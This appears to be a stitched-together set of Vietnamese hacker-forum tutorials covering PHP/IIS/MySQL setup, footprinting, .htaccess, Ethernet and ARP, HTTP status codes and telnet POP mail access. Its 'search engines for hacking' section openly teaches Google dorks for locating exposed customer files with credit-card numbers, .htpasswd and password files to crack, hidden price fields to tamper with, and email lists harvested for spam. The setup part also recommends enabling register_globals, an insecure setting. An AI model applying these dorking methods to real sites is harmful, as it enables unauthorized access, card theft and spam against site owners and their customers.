#!/perl/bin/perl.exe

# simple hello world cgi script

print "Content-type: text/html

";

print "Hello world from PERL $]

";

Lưu hai file này vào thư mục "wwwroot". Bây giờ thì mở IE, nhập vào "http://localhost/cgi-bin/hello.cgi" và "http://localhost/cgi-bin/hello.pl". Nếu bạn nhận được: Hello, world!

Xin chúc mừng bạn!

1. Cài PHP

Download tại

http://k.domaindlx.com/clairsang/www.php.net/default.htm

Nên cài chương trình này vào thư mục mặc định là C:\PHP

Chạy setup nếu bạn download file *.exe trên www.php.net về. Còn nếu không thì thực hiện theo các bước sau :

Tìm file "php.ini-dist" trong thư mục "C:\PHP" và đổi tên thành "php.ini"

Copy file "php.ini" và thư mục "C:\WINDOWS" hoặc "C:\WINNT" (thư mục mà bạn cài đặt Windows đó!)

Copy 2 files "msvcrt.dll" và "php4ts.dll" từ "C:\PHP" vào "C:\WINDOWS\SYSTEM" hoặc "C:\WINNT\SYSTEM32".

Sau khi cài PHP, trong máy của bạn sẽ có file php.ini trong c:\winnt hoặc C:\windows, bạn nên thay đổi một chút. Nào, bây giờ ta dùng một chương trình để sửa file php.ini, tôi dùng Notepad có trong windows, vào thư mục c:\winnt hoặc c:\windows , mở file php.ini và làm như sau :

Tìm dòng register_globals và thay đổi thành On

Tìm dòng error_reporting và chuyển E_ALL thành off

Tìm dòng include_path và thêm vào dưới dòng đó đường dẫncủa thư mục root : ".;c:\inetpub\wwwroot"

SAVE lại và EXIT.

(Chú ý : Nếu bạn dùng Notepad hãy nhấn F3 rồi gõ từ cần tìm vào hộp tìm kiếm)

Để đỡ rắc rối, các bạn hãy copy paste nguyên nội dung file này vào file php.ini của bạn. File đó đây

http://k.domaindlx.com/clairsang/www.diendantinhoc.net/tute/hethong/phpnuke/php.txt

2.Cấu hình để IIS chạy được php.

Mở Control Panel ->Administrative Tools ->Internet Services Manager

Nhấn chuột phải vào website và chọn Properties

Click tab Home Directory, đổi thành Scripts and Executables Trong Execute Permissions.

Chọn Configuration, trong tab App Mappings chọn Add.

trong hộp Executable bạn cần browse tới file php.exe trong thư mục đã install PHP (thường là c:\php\php.exe). Thêm %s %s và phía sau thành c:\php\php.exe %s %s. Gõ vào hộp Extension dòng chữ sau .php (Có cả dấu chấm).

Nhấn Apply / OK / OK .

3.Chạy thử php.

Để test PHP, hãy tạo một file "info.php" có nội dung như sau:

<?php

phpinfo();

?>

Copy file info.php vào wwwroot, Mở IE, nhập vào "http://localhost/info.php". Nếu IE hiện ra thông số của PHP thì đã thành công. Còn nếu báo thiếu file *.dll thì bạn hãy tìm trong thư mục C:\PHP xem file đó nằm ở đâu, copy file đó vào vào "C:\WINDOWS\SYSTEM" hoặc "C:\WINNT\SYSTEM32".

1. Cài MySql

Download MySql tại

http://k.domaindlx.com/clairsang/www.mysql.com/default.htm

Nên cài nó vào thư mục mặc định là C:\MySql

Chạy file SETUP của bộ cài đặt MySQL, hay file nén Installer. Chọn đường dẫn mặc định. :wink:

2.Cấu hình cho MySQL

Chạy "C:\mysql\bin\winmysqladmin.exe"

Sau khi chạy winmysqladmin.exe, bạn sẽ nhận được một thông báo yêu cầu tạo user+password cho mySQL. Bạn hãy tạo một localname(user) và password. Và bạn phải nhớ user và password này đó! Nếu không, bạn sẽ không thể nào kết nối đến mySQL từ web server của bạn đâu!

Thường thì tôi dùng user : root pass : tùy ý. Bạn có thể chọn theo cách của bạn.

Thoát winmysqladmin.exe

Bạn đã cấu hình xong mySQL rồi đó!

3.Kiểm tra MySQL

Để test mySQL, hãy tạo một file "test.php" có nội dung như sau:

<?php

$link = mysql_connect ("localhost", "username", "password")

or die ("Could not connect");

print ("Connected successfully");

mysql_close ($link);

?>

Thay đổi "username" và "password" thành user và password mà bạn đã tạo sau khi chạy winmysqladmin.exe!

Hãy lưu file "test.php" trong thư mục "wwwroot". Mở IE, nhập vào "http://localhost/test.php". Nếu nhận được: dòng Connected successfully.

Xin chúc mừng bạn đã thành công! Một số bài nên tham khảo :

Cài đặt Apache, mySQL, PHP, GD for Linux

http://k.domaindlx.com/clairsang/www.diendantinhoc.net/tute/hethong/apache-mysql-php-perl/default.htm

Cài đặt Apache, mySQL, PHP, Perl for Win

http://k.domaindlx.com/clairsang/www.diendantinhoc.net/tute/hethong/apache-mysql-php-perl/default.htm

Và một số bài khác

http://k.domaindlx.com/clairsang/www.diendantinhoc.net/tute/default.htm

P/s:

sau khi cài MySQL thì download thêm phpmyadmin về sử dụng để quản lí MySQL dễ dàng hơn. Cách cài và chỗ download phpmyadmin có trong bài Cài đặt Apache, mySQL, PHP, Perl for Win

In dấu ấn (

FootPrinting):

Trước khi 1 hacker bắt đầu làm công việc của anh ta , 3 yếu tố cần thiết phải được làm đầy đủ . FootPrinting là một trong ba yếu tố đó . Chúng ta hãy cùng xem xét về nó . FootPrinting đơn giản chỉ là thu thập , tập hợp thông tin về mục tiêu . Ví dụ như như 1 tên cướp nhà quyết định sẽ cướp nhà băng thì anh ta sẽ không đi dạo quanh nhà băng và đòi hỏi tiền 1 cách khắt khe . Thay vào đó , anh ta sẽ bắt đầu thu thập thông tin về nhà băng : các xe bọc sắt chở tiền và thời gian của xe đi , các camera đặt trong nhà băng , số nhân viên phục vụ , số nhân viên bảo vệ , cửa để thoát thân ... và mọi thứ để giúp anh ta thực hiện hoàn hảo phi vụ này .

Tương tự cũng như đối với attacker hay hacker . Họ phải khai thác 1 kho tàng thông tin vô giá của đối tượng cho việc tấn công . Và kết quả là attacker thu thập được cả đống thông tin , có thể về 1 tổ chức bí mật nào đó .

Vậy FootPrinting thực sự là gì ?

Hệ thống thăm dò của một tổ chức tạo điều kiện cho attacker tạo một kho dữ liệu không lồ của 1 tổ chức bí mật . Bằng cách sử dụng 1 số công cụ và công nghệ mới , attacker có thể làm công việc này một cách khá dễ dàng . Có nhiều môi trường làm việc khác nhau như : Internet , Intranet ... Mỗi thứ lại có 1 cách thăm dò và đối tượng khác nhau .

INTERNET :

Domain Name, Network blocks , Specific IP address of systems reâchble via the Internet , TCP và UDP services running on each system identified , System architeture ( vd: SPARC vs. X86 ) , Access Control mechanisms and related access control list ( ACLs ) , Intrusion detection system ( IDSes ), System enumeration ( user and group names , system banner , routing tables , SNMP information )

INTRANET :

Networking Prototcols in use ( vd : IP , IPX , DecNet ... ),Intranet Domain Names , Network blocks , Specific IP address of systems reachable via intranet , TCP and UDP services running on each systen indentified , System architecture ( vd : SPARC vs X86. ) , Access Control mechanisms and related access control list ( ACLs ) , Intrusion detection system , System enumeration ( user and group names , system banner , routing tables , SNMP information )

REMOTE ACCESS :

Analog/digital telephone numbers , Remote System type , Authentication mechanisms , VPNs and related protocols ( IPSEC, PPTP )

EXTRANET :

Connection origination and destination , Type of Connection , Access Control Mechanisms.

Có phải FootPrinting thật sự cần thiết ? Rất cần thiết . Nó cho bạn nhiều thứ . Thông tin là vàng là bạc .

Như vậy bạn đã phần nào hiểu về FootPrinting . Có nhiều cách đề làm việc này như Ping , Whois ... và hãy tận dụng các máy chủ tìm kiếm .. nó đem lại cho bạn nhiều thứ hơn bạn nghĩ đó .

Các công nghệ và chi tiết về nó :

+ Web interface :

http://www.networksolutions.com/

http://www.arin.net/

: Any platform with a web client .

+ Whois Client : UNIX

+ WS_Ping ProPack :

http://www.ipswitch.com/

: Windows 95/NT/2000

+ Sam Spade :

www.samspade.org/ssw

: Windows 95/NT/2000

+ Sam Spade Web Interface :

http://www.samspade.org/

: Any platform with a web client

+ Netscan Tools :

www.netscantools.com/nstpromain.html

: Windows 95/NT/2000

+ Xwhois :

www.c64.org/~nr/xwhois/

: Unix with X and GTK + GUI toolkit .

Đây chỉ là một trong những bước mà một attacker hay hacker phải làm . Về Domain hãy chú ý đến DNS , có được nó , có khi bạn chẳng làm gì mà có thể kiểm soát cả Server ....

Sử dụng .htaccess

Giới thiệu

.htaccess là cái gì vậy nhỉ, hẳn đôi khi bạn vẫn nghe thấy nó được nhắc đến một cách bí hiểm trên một số diễn đàn hay trong các bài viết, chẳng hạn như "sử dụng .htaccess để làm ...", " thông qua .htaccess..."....

Xin bạn đừng quá ngạc nhiên khi nghe hay nhìn thấy những kết quả của việc sử dụng .htaccess, bài viết này sẽ trình bày một số cách sử dụng .htacces trên các server sử dụng Apache lamf máy chủ, và sau khi đọc xong bạn sẽ thấy nó dễ như "uống một cốc nước tăng lực khi đang khát zậy ! "

1. Các trang báo lỗi:

Trong quá trình làm việc với client, nếu có lỗi xảy ra (vi dụ như không tìm thấy file) thì Apache sẽ báo lỗi bằng một trang có sẵn hiển thị mã số của lỗi đó, rất không đẹp và khó hiểu. Với .haccess thì bạn có thể tự tạo các trang báo lỗi hay hơn. Để làm được điều này thì trong file .htaccess bạn thêm dòng sau:

ErrorDocument errornumber /file.html

Trong đó errornumber là mã số của lỗi phát sinh, sau đây là những lỗi hay gặp:

401 - Authorization Required (cần password để truy nhập)

400 - Bad request (request bị sai)

403 - Forbidden (không được vào)

500 - Internal Server Error (lỗi server)

404 - Wrong page (lỗi trang, không tìm thấy...)

còn file.html là trang web mà ban muốn hiện thị khi lỗi phát sinh. Ví dụ:

ErrorDocument 404 /notfound.html

hoặc:

ErrorDocument 500 /errorpages/500.html

2. Không cho hiện danh sách file trong thư mục:

Trong trường hợp bạn không muốn cho người khác thấy được danh sách file trong thu mục không có file index, thêm lệnh sau vào .htaccess:

Options -Indexes

3. Chỉ định các IP được/không được truy cập vào trang web:

Thêm lệnh sau:

deny from 203.239.110.2

để cấm ip 203.239.110.2 hoặc

allow from 203.239.110.20

để cho phép ip 203.239.110.20. Nếu bạn chỉ viêt ip dưới dạng

203.239.110 thì sẽ cấm/cho phép tất cả ip trong giải từ 203.239.110.1 đến 203.239.110.254.

Còn:

deny from all

sẽ cấm tất cả mọi truy cập đến các trang web trong thư mục, tuy nhiên các file trong đó vẫn có thể được sử dụng từ bên ngoài thông qua các dang require hay include.

4. Thay thế trang index:

Dùng dòng lệnh sau:

DirectoryIndex index.php index.php3 messagebrd.pl index.html index.htm

Với dòng lệnh này thì tất cả các file được liệt kê sẽ được tìm theo thứ tự khi có yêu cầu tới thư mục hiện hành, trang nào được tìm thấy đầu tiên sẽ thành trang index của thư mục.

5. Redirection

Có thể redirect truy cập từ xa một cách đơn giản bằng lệnh sau:

Redirect /location/from/root/file.ext

http://k.domaindlx.com/clairsang/www.othersite.com/new/file/location.xyz

hoặc

Redirect /olddirectory

http://k.domaindlx.com/clairsang/www.newsite.com/newdirectory

6. Bảo vệ thư mục bằng password

Trong file .htaccess có thể viết thêm:

AuthUserFile /mnt/web/guide/somewhere/somepath/.htpasswd

AuthGroupFile /dev/null

AuthName Somewhere.com's Secret Section

AuthType Basic

<Limit GET POST>

require valid-user

</Limit>

Trong đó quan trọng nhất là file .htpassword, có dạng như sau:

username:v3l0KWx6v8mQM

bob:x4DtaLTqsElC2

với phần trước là tên user, phần sau là password đã được mã hoá bằng DES (có thể dùng john để giải mã ). Bạn có thể tạo ra file .htpasswd này bằng một công cụ có sẵn trong *nix là trình htpasswd, vi dụ:

root@vnofear$htpasswd -c .htpasswd username

Adding password for username.

New password:

password

Re-type new password:

password

xem man htpasswd để biết thêm chi tiết. Khi truy cập vào thư mục được bảo vệ bởi .htpasswd, browser sẽ hiện ra một cửa sổ yêu cầu bạn nhập username và password.

Lưu ý trước khi sử dụng .htaccess bạn nhớ kiểm tra xem host server có hỗ trợ .htaccess hay không.

Căn bản về Ethernet :

Ethernet (bài này viết tắt là Ethe cho dễ) là một trong nhiều dạng network và là dạng được dùng phổ biến nhất hiện nay. Trong mạng Ethe, các máy được nối trực tiếp với cáp chung (common media access) theo mô hình sau:

| Máy 1 Máy 2 Máy 3...

|---------+--------------+--------------+----... <--- cáp chung

|-------------------...

Tầm hoạt động của mạng ethe không lớn. Mỗi máy có thể kết nối vào dây chung ở tầm 400m (có thể lên tới 2000m hoặc 4000m). Nếu muốn kết nối xa hơn thì phải có những trạm truyền tiếp (hub, repeater, switch, router, ...). Tốc độ truyền của ethe cũng khá cao. Hiện nay thường dùng 100Mbps (FastEthernet) và cũng có 1000Mbps (GigaEthernet).

Đó là lý do tại sao ethe là mạng dùng CSMA/CD (carrier sense media access/collision detection) để hiểu xem mạng có rỗi mà truyền thông tin không. Vì ethe dùng chung cáp nên mỗi máy trước khi gửi tín hiệu phải xem coi cáp chung có rỗi hay không. Mỗi máy sẽ lắng nghe tín hiệu của dây chung để biết lúc nào dây chung rỗi hay lúc nào đang bận. Nếu mạng đang bận, máy đó sẽ phải chờ (thường là vào khoảng 7 đến 10 ms) rồi lắng nghe lại. Giả sử cùng lúc mạng đang rỗi mà có 2 máy đồng thời gửi tín hiệu, sẽ xảy ra hiện tượng tín hiệu bị chuyển sai lệch hoặc tín hiệu này chồng lên tín hiệu khác gọi là collision (sự va chạm). Phát hiện ra điều đó, 2 máy sẽ chờ một thời gian ngẫu nhiên. Nếu vô tình thời gian chờ ngẫu nhiên của 2 máy chênh nhau không nhiều, collision lại xảy ra thì thời gian chờ của 2 máy sẽ gấp đôi thời gian chờ ban đầu. Lần thứ 3 sẽ gấp 4, lần thứ 4 sẽ gấp 8... Lặp lại như vậy sẽ dẫn tới việc một máy sẽ gửi tín hiệu đi trước và máy khác đợi tới lượt mình sau. Đó là ý tưởng của carrier sense media access và collision detection.

Cũng chính vì lý do dùng chung cáp nên mọi thông tin gửi đi từ một máy sẽ chạy khắp nơi trên mạng. Việc nhận hay bỏ (accept hay discard) sẽ do NIC (network interface card, card giao tiếp mạng) đảm nhận. Đôi khi, việc này sẽ do chương trình đảm nhận (nhiều card mạng không discard các tín hiệu không phải dành cho mình mà tin tưởng vào chương trình sẽ không nhận các tín hiệu đó). Giả sử máy A gửi tín hiệu cho máy B trong cùng mạng. Máy C, nếu ở trong cùng mạng đó, cũng sẽ nhận được tín hiệu do máy A gửi. Vậy thì làm sao máy 2 máy có thể gửi thông tin cho nhau?

Vấn đề này được giải quyết ở lớp Data link (không biết dịch ra sao, data link layer). Đọc thêm về chuẩn ISO OSI để hiểu thêm về 7 lớp OSI. Data link layer có một sublayer gọi là Media Access Control (MAC) sublayer. Lớp này làm nhiệm vụ nhận và chuyển tín hiệu vào cáp chung dựa trên địa chỉ card mạng.

Địa chỉ card mạng hay còn được gọi là MAC address là một chuỗi 6 byte, phân ra làm 2 phần. Phần đầu tiên gồm 3 byte, được quy định bởi IEEE (Institute of Electrical & Electronics Engineers) cho nhà sản xuất. Mỗi nhà sản xuất sẽ có 3 byte riêng biệt. Ví dụ IBM có 3 byte khác với 3COM. Phần thứ 2 gồm 3 byte cuối, do nhà sản xuất quyết định. Ví dụ địa chỉ MAC FF.00.FF.E0.01.56 thì phần xác định nhà sản xuất là FF.00.FF, phần xác định card là E0.01.56. Với các chia địa chỉ MAC như vậy sẽ không có một card mạng nào có địa chỉ MAC trùng với một card nào trên thế giới. Do đó, khi một máy trong mạng ethe gửi thông tin đến máy khác, máy đó dùng địa chỉ MAC của máy kia. Máy nhận so sánh địa chỉ MAC được gửi đi với địa chỉ MAC của card mình. Nếu là thông tin gửi cho mình thì hai địa chỉ đó sẽ giống nhau và máy nhận nhận thông tin đó. Nếu không phải, máy nhận sẽ bỏ qua, không xử lý (trên lý thuyết).

Một máy (máy thứ nhất) muốn biết địa chỉ MAC của máy khác (máy thứ hai) sẽ gửi thông điệp ARP (Address Resolution Protocol, Giao thức tra cứu địa chỉ, từ IP ra MAC, từ MAC ra IP sẽ dùng RARP, Reverse Address Resolution Protocol) đi khắp subnet nếu máy thứ đó biết máy thứ hai ở trong cùng subnet. Máy thứ hai sẽ trả lời máy thứ nhất với địa chỉ MAC của mình và cũng lưu lại địa chỉ MAC của máy thứ nhất để dùng cho sau này. Mô hình như sau (ví dụ cho IP, các giao thức khác cũng tương tự):

Máy 1: IP 1.1.1.1, MAC: 00.FF.FF.00.00.03

Máy 2: IP 1.1.1.2, MAC: 05.FF.0E.00.05.04

Tôi có địa chỉ MAC 00.FF.FF.00.00.03. Ai có IP 1.1.1.2 thì trả lời.

Máy 1 ----------------------------------------------------------> Toàn subnet (multicast)

Tôi có IP 1.1.1.2 với địa chỉ MAC 05.FF.0E.00.05.04.

Máy 2 ----------------------------------------------------------> Máy 1

Trong khi đó, máy 2 cũng lưu lại địa chỉ MAC 00.FF.FF.00.00.03 của máy 1 để dùng lại sau này.

Sau khi đã biết được địa chỉ MAC của nhau, việc gửi thông tin có thể được tiến hành

Http code :

Http là giao thức được sử dụng trong internet, thông thường khi request 1 website, bạn sẽ nhận được nhưng thông báo Bài viết này sẽ giúp bạn hiểu rõ hơn về các thông báo đó ( chỉ trích dẫn những thông báo thông dụng nhât ) :

1xx - Information code - Mã Thông Tin

100 - Tiếp tục ( cont. ):

Chờ phần cuối cùng của yêu cầu ( request ), Phần đầu của yêu cầu đã được máy chủ nhận và chờ gửi lại mã này để máy con gửi tiếp phần còn lại

101 - Thay đổi giao thức:

Máy con yêu cầu máy chủ thay đổi giao thức ( protocol ) để nhận tiếp phần data tiếp theo

2xx - Sucess Code - Mã thành công

200 - OK

yêu cầu HTTP đã thành công. Thông tin trả lời của máy chủ sẽ dự trên yêu cầu ( GET - POST )

201 - Created -

202 - Accepted ( Chấp nhận )

Yêu cầu đã được máy chủ chấp nhận để thi hành ( nhưng chưa thi hành xong )

203 : Thông tin chưa được xác định :

Thông thường thông tin được gởi thẳng từ máy chủ đến máy con. Nếu koh^ng phải , mã này sẽ được gửi để báo đây không phải là data gửi từ máy chủ xác đi.nh.

204 : No content ( không có nội dung )

Yêu cầu đã được máy chủ nhận nhưng không có dữ liệu nào được gửi ngược lại, khi web broswer nhận thông báo này sẽ không thay đổi nội dung trang web đang hiển thị

205: Reset Content ( xoá nội dung )

Web broswer sẽ phải xóa nội dung của form được dùng trong lần yêu cầu nàỵ

3xx - Redirect Code ( mã chuyển hươ"ng )

300 : Multiple choice ( nhiều lực chọn )

URL của yêu cầu chứa nhiều tùy chọn ( ví dụ như 1 văn bản nhưng có nhiều ngôn ngữ ) Thông tin máy chủ gởi lại sẽ chứa nhũng tùy chọn.

301: Move Permanently: ( Chuyển cố định )

Yêu cầu đã được chuyển đê"n 1 URL mới...Máy con nên ghi lại thay đổi này cho lần yêu cầu tiếp theo

302: Move Temporary ( Chuyển tạm thời )

Phần yêu cầu đã được chuyển tạm thời đến 1 URL mớị Máy con không phải ghi nhận lại thay đổi nàỵ

303: See Other

304: Not modified

305: Use Proxy:

URL yêu cầu phải được truy cập qua 1 proxy trong mạng nội bộ

4xx - Client Errors

400 Bad request

Máy chủ khÔng thể nhận dzạng được yêu cầu ( web broswer có thể quá mớy hay máy chủ quá cũ )

401: Không có quyền :

Thông tin yêu cầu cần có chủ quyền ( username and password ) mới có thể đọc

402: Payment Require ( Yêu cầu trả tiền )

Code này chưa được phát triển ( may quá )

403: Forbiđen: ( cấm truy nhập )

Máy chủ hiểu yêu cầu nhưng không muốn cho máy con nhận thông tin.

404: Not found ( khÔng tìm thấy ) <- quá rõ khỏi nói thêm

405: Method not allowed ( Phương thức koh^ng đu=ợc cho phép )

Phương thức yêu cầu không được chấp nhận ở server

406: Not Acceptable ( Không chấp nhận )

407: Proxy Authentication Required:

Proxy phải kiểm tra quyền của bạn trước khi chuyển thông tin đi qua

408: Request Time Out ( Thời gian yêu cầu hết )

Bạn nhận được code này khi request chuyển trong 1 thời gian quá dài, nghĩa là server nhận được phần đầu của request sau đó chờ phần tiếp theo mà chưa nhận được

409 : Conflic

Sử dụng công cụ tìm kiếm cho việc hack :

Tôi biết bạn đang nghĩ gì ? " Làm thế nào để tôi có thể dùng công cụ tìm kiếm để hack ?" điều này không khó, nó có thể giúp cho bạn những lợi ích thật sự nhanh và dễ dàng. Chúng cho phép bạn tìm thấy những điều mà bạn thực sự sẽ chưa bao giờ tìm thấy trước đó. Và với đặc điểm tìm kiếm mới của google, bạn có thể thấy được những điều đã được đưa xuống. Tôi sẽ giải thích vài tình huống nơi tôi đã sử dụng công cụ tìm kiếm để có thể đột nhập và xem những gì mà admin muốn giữ bí mật

Bây giờ một phần lớn của điều mà nghe có vẻ như tôi là scripts kiddie :) và với kỹ thuật này nó có vẻ là khá hữu dụng. Không có gì là sai với việc tìm con đường dễ bây giờ và về sau.

Vì vậy chúng ta bắt đầu với ví dụ đầu tiên của việc sử dụng công cụ tìm kiếm để hack. Cơ sở dữ liệu là những file chứa dữ liệu trong đó,và chúng thường là thông tin, cơ sở dữ liệu hay là những gì ? (info.db,database.txt,list.txt)…. những cơ sở dữ liệu đó có thể chứa rất nhiều thứ khác nhau và khi để cả thế giới biết thì chúng có thể bị khai thác.

chúng ta hãy nói về công ty AAA, họ bán giấy trên web sites của họ. Công ty AAA đã sử dụng scripts từ http://k.domaindlx.com/clairsang/www.freescripts.com/default.htm

vậy bước đầu tiên của chúng ta là gì ?

Chúng ta kiểm tra công ty AAA và thấy rằng họ đang sử dụng scripts từ http://www.freescripts.com/ và đầu tiên chúng ta kiểm tra Net để biết khai thác scripts. Nhưng bạn có biết chúng bằt đầu từ đâu không ? Tìm kiếm tên của một file trên google

"download submitform3.php3"

Nếu nó là một tên thông thường ta sẽ tìm được vài mẫu lệnh của scripts mà chứa ở trên tất cả các scripts,ví dụ : "scripts coded by redranger" và tìm kiếm nó

Ok bây giờ bạn đã có tên trang web chứa scripts, tìm trong trang chủ của nó,tìm kiếm để biết khai thác và bạn cảm thấy thế thật là mất thời gian của bạn, cố gắng lần này, download scripts ở trên trang chủ của nó và nhìn toàn bộ để khai thác

Tôi đã thực sự kinh ngạc vì tỷ lệ của scripts có lỗ hổng bảo mật trong chúng (một cách hay nhiều cách khác nhau)

Bạn chưa từng tìm kiếm và khai thác thành công ?

Không sao cả, người bạn google sẽ giúp chúng ta.

Đến trang http://www.google.com/,đánh "allinurl:php site" và Enter : http://www.itvnonline.net/bai%20viet/www.google.com nó sẽ tìm bat cu php scripts tren cong ti AAA.

Bạn cũng có thể tìm kiếm allinurl:cgi hoặc jsp hoặc bất cứ scripts nào bạn muốn tìm. Con đường tốt nhất cho mục tiêu ngẫu nhiên là khai thác được scripts mới nhất từ bugtraq và allinurl:script.cgi……… tôi không đề nghị như vậy, bởi vì như vậy thực sự là không hợp lý, một người nào đó có thể làm vậy và bạn không có lý do gì để khai thác nhiều trong số trang đó……nhưng có thể bạn sẽ phải đi ngang qua trang web củ kẻ địch

Tro lai co so du lieu,noi ve scripts trong cong ti AAA dua vao tu form cua truong khi ma nguoi su dung mua mot cai gi do.Nguoi su dung se dua vao ten,ngay sinh,dia chi,so dien thoai,the tin dung cua ho.scripts se luu tru nhung thong tin trong userdb.txt

Bay gio ban co the dung google voi allinurl:urluserdb.txt site:congtiAAA.com va nhin vao vi tri file nay dang luu tru,neu ban o thay co ket qua thi do la vi ho da thay doi ten cua db file hoac la ho dang chua chung trong thu muc o the doc duoc

Neu ban tim kiem co ket qua,co gang tim toan bo Net voi allinurl:userdb.txt

Hacker co the co duoc tap hop kha nhieu so the tin dung o trong tung thoi gian ngan voi ki thuat nay

Vao 1 ngay toi gui thong tin len trang web cua toi va toi nhan duoc 20000 email tu tim kiem file co so du lieu mac dinh de gui nhung scripts

Day la tin duoc gui tu ngay do

I decided to do a little searching google today….I found thousands of password.txt,passwd.txt,pass.txt and other files people don't want me seeing. Then while directory browsing a site I found maillist/address.txt which had like 20 email address in it …I think it is solution scripts powerlist scripts:

$address_file="address.txt" unless $address_file;

$pwd_file="password.txt" unless $pwd_file;

so I searched for address.txt and found tons of site with email lists.After downloading some popular mailing list scripts I checked them to see what their default mailing list database files were and I searched for those on google.I gathered over 20000 email address……I dunno if this is a lot in the spamming world, but I'd say It's something people should be alittle concerned about.

(ngay hom nay toi quyet dinh tim kiem 1 chut voi google….toi da tim thay hang ngan password.txt,passwd.txt,pass.txt va rat nhieu files ma moi nguoi o muon toi nhin thay.Sau do trong khi thu muc tim kiem site toi da tim thay mailinglist/address.txt va co khoang 20 email trong do,toi nghi day la kha nang scripts de giai quyet

$address_file="address.txt" unless $address_file;

$pwd_file="password.txt" unless $pwd_file;

sau do toi tim kiem address.txt va toi nhin thay nhieu trang web voi list mail

sau khi download 1 so scripts trong list nhung email pho bien,toi da kiem tra chung va thay co gia tri mac dinh cua file co so du lieu o do va toi da tim duoc rat nhieu cai nhu the tren google

toi da thu thap duoc hon 20000 dia chi email ……toi muon noi rang moi thu co lien quan voi nhau)

tim kiem allinurl:htpasswd se dan den rat nhieu cau hinh cua trang web ma no cho fep ban xem ".htpasswd file".Co rat nhieu admin va user ngu ngoc se su dung login giong nhau,password cho tai khoan cua ho nhu ho da lam voi ".htpasswd"

dieu nay co nghia la neu 1 lan ban co .htpasswd va crack no,ban co the truy cap vao tai khoan cua ho.

Toi quyet dinh day co the la 1 phuong phap tot cho nguoi duoc phep tim kiem thu muc,ban co the doc duoc khoa hoc hay tai http://www.lameindustries.org/tutorials/victimcom/index.shtml

Toi da tim kiem "index of" tai google va cuoi cung thay rang

"of" la 1 tu rat thong dung va se o duoc dua vao tim kiem cua ban.

Vi the nen toi biet rang tim kiem "index" se o giup ta tim duoc nhung gi ta muon .vi the nen toi da nghi den cai thu 2 va co gang tim kiem thu muc ro rang ma toi muon xem

"index of/password" la tim kiem dau tien cua toi…….16000 ket qua

toi nghi dieu nay co the lam trong 1 lat è nao bay gio chung ta tim den mon thu vi hon

"index of/password" "index of/passwd" "index of/warez" "index of/boobs"

eeeee va day la buoc cuoi cung

o 1 buoc tiep theo toi nhan duoc thong tin o http://budkwan.virtualave.net/

anh ta noi voi toi lam the nao de mua xe su dung truong dua vao la an de dinh gia,vi the tim kiem type=hidden name=price boc lo ra it hon 100 trang voi loi nay

toi chac chan rang ban co the su dung cac phuong phap tim kiem khac

ho cho fep ban tim nhung holes trong form html ,password mac dinh

co so du lieu mac dinh and tim nhung loi bao mat rat nhanh va don gian.

Đôi điều về Telnet :

1- Giới thiệu:

Là một chương trình cho phép bạn kết nối và đăng nhập vào một máy tính ở xa (trong LAN, internet). Khi kết nối thành công, máy tính của bạn sẽ thực hiện chức năng như trạm trung gian để gửi yêu cầu đến máy tính ở xa.

Bạn có thể dùng máy tính của mình để truy cập thông tin, thực thi các chương trình và sử dụng một số tài nguyên khác trên máy tính ở xa.

2- Sử dụng telnet:

Bắt đầu từ command prompt, gõ vào telnet, nếu bạn dùng 9x, nó sẽ đưa bạn vào trình windows telnet. Bạn cũng có thể chạy ở menu Start/Run.

Ở chế độ đánh lệnh, bạn có thể dùng các lệnh sau:

OPEN <hostname/site address> <port number>

: mở một kết nốI đến máy tính ở xa, gọi là 1 telnet session

CLOSE

: đóng kết nối và trở về dấu nhắc đợI lệnh

QUIT

: đóng kết nối và thoát telnet

<ENTER>

: nhấn phím enter sẽ đưa bạn thoát khỏI chế độ dấu nhắc lệnh và trở lại telnet session

SET ECHO

: bật/tắt chế độ hiện các lệnh đánh vào trong windows telnet. Lưu ý trong 2k sẽ là SET LOCAL_ECHO

Để kết nối, ta dùng lệnh OPEN hoặc cũng có thể trực tiếp bằng lệnh

telnet <hostname/site address> <port number>

vd:

telnet anyhost.com 12345

Trying 123.123.112.12 port 12345

Connected to anyhost.com

Escape character is….

Sau khi kết nối xong, bạn đã ở trong một telnet session. Có thể dùng kí tự escape ở trên để trở về dấu nhắc lệnh.

3- Ứng dụng telnet để truy cập POP email

a- Ðọc mail

Các internet mail server cho phép truy cập thông qua giao thức POP (Post Office Protocol), cổng 110. Nếu POP server bạn đang dùng là anyhost.com, thì ta sẽ dùng lệnh sau: telnet anyhost.com 110

Một số các lệnh có thể bạn cần dùng khi truy cập POP email

USER <username> : mở hộp thư của username

PASS <password> : mật khẩu cho hộp thư

LIST : liệt kê các emails trong hộp thư

RETR <email number> : xem thư có thứ tự là number, được liệt kê trong lệnh LIST

TOP <email number> <message lines> : xem thư như RETR, nhưng dừng lại khi hiện được số dòng nhất định

DELE <email number> : xóa thư có thứ tự number

QUIT : đóng telnet session

Ví dụ, ta sẽ truy cập vào yahoo để xem mail, ta thực hiện lệnh

telnet pop.mail.yahoo.com 110 <enter> và chờ một chút...

Nếu thành công, bạn sẽ nhận được dòng thông tin sau:

+OK hello from popgate

Kể từ đây, nếu trước khi mở 1 telnet session, bạn có dùng SET ECHO, thì những gì bạn đánh vào sẽ hiện lên, không thì bạn phải nhập các lệnh thật chính xác

Nhập tên user

USER huutung_2001

+OK password required

Nhập mật khẩu

PASS tungxeng

+OK maildrop ready, 2 messages (2983 octets) (34232 2324232)

Ở đây, mail box của tôi có 2 tin, kế đến là tổng kích thước của các email, các số còn lại bạn không cần quan tâm

Bạn dùng lệnh list để liệt kê các email, bao gồm stt và size:

list

1 1728

2 1205

.

Ðể xem một mail có stt nào đó, bạn dùng lệnh retr <message number>

retr 1

Chờ một chút, bạn sẽ nhận được những thông tin đầy đủ về mail đó, bao gồm toàn bộ header và nội dung

vd:

+OK 1783 octets

X-Apparently-To: [email protected] via web20306.mail.yahoo.com; 04 Jan 2002 23:4

8:08 -0800 (PST)

X-RocketRCL: 1037;1;2465408753

Received: from web11904.mail.yahoo.com (216.136.172.18

by mta621.mail.yahoo.com with SMTP; 04 Jan 2002 23:48:08 -0800 (PST)

Message-ID: <[email protected]>

Received: from [61.214.156.105] by web11904.mail.yahoo.com via HTTP; Fri, 04 Jan

2002 23:48:08 PST

Date: Fri, 4 Jan 2002 23:48:08 -0800 (PST)

From: yen ruoi <[email protected]>

Subject: Re: hi?

To: F M <[email protected]>

In-Reply-To: <[email protected]>

MIME-Version: 1.0

Content-Type: multipart/alternative;

......vvv

.

Về những thông tin trong email header,bạn tự tìm hiểu lấy! )

